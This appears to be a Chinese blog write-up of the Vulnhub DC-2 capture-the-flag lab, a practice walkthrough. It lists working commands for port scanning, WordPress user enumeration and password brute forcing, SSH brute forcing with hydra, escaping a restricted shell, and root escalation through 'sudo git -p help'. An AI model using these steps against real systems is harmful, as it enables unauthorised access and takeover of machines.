Vulnhub DC-2

信息收集

arp扫内网
Vulnhub DC-2
扫端口

nmap -A -p- -T4 192.168.1.139 -v

Vulnhub DC-2
发现端口80和7744(ssh)

直接访问80端口会跳转,导致无法访问
kali修改hosts
Vulnhub DC-2

漏洞利用

Vulnhub DC-2
成功访问后到flag1

给了提示要用到cewl,cewl kali自带,用于爬行网站生成弱密码

cewl http://dc-2/ -w dc-2.txt

但是不知道用户名,先留着,
这里是wordpress框架,用wpscan(kali自带)爆出用户名

wpscan --url dc-2 -e u

Vulnhub DC-2
爆出三个用户,在用cewl生成的字典进行密码爆破

wpscan --url http://dc-2 -P dc-2.txt -U admin

爆出来两个

tom/parturient jerry/adipiscing

dirb 扫目录

dirb http://dc-2

访问会直接跳转登录,拿上面账号登录
http://dc-2/wp-admin/user/

tom登录没东西
拿jerry登录

找到flag2
Vulnhub DC-2
有个ssh,尝试爆破ssh

hydra -l tom -P dc-2.txt 192.168.1.139 ssh -s 7744 -V -t 5

Vulnhub DC-2
jerry爆破失败

tom登录成功,不能用cat
Vulnhub DC-2
命令执行绕过
最终发现只能用less
Vulnhub DC-2

看到提示
Vulnhub DC-2
发现有个su,用su登录jerry,这里也不知道为啥,jerry有密码但却不能爆破成功
其实做多了就知道flag在用户目录下
Vulnhub DC-2
还是照着提示来,su不能用,要进行绕过

新东西

shell绕过限制

shell绕过限制学习
这里用修改环境变量的方法

export PATH=$PATH:/bin/   
export PATH=$PATH:/usr/bin

当然看到别的wp里还有别的手法,我个人没试出来

可使用less绕过:$less test    然后!'sh'
使用ls绕过:$man ls    然后!'sh'
使用vi绕过:$vi test    然后:!/bin/sh 或者 :!/bin/bash

即可绕过,然后flag4在jerry用户目录下
Vulnhub DC-2

提权

提示提到了git,搜索git提权

切换jerry登录

sudo git help config
sudo git -p help
sudo git -p --help

成功提权
Vulnhub DC-2

上一篇:VulnHub靶场学习:Billu_b0x


下一篇:vulnhub dc-9靶机通关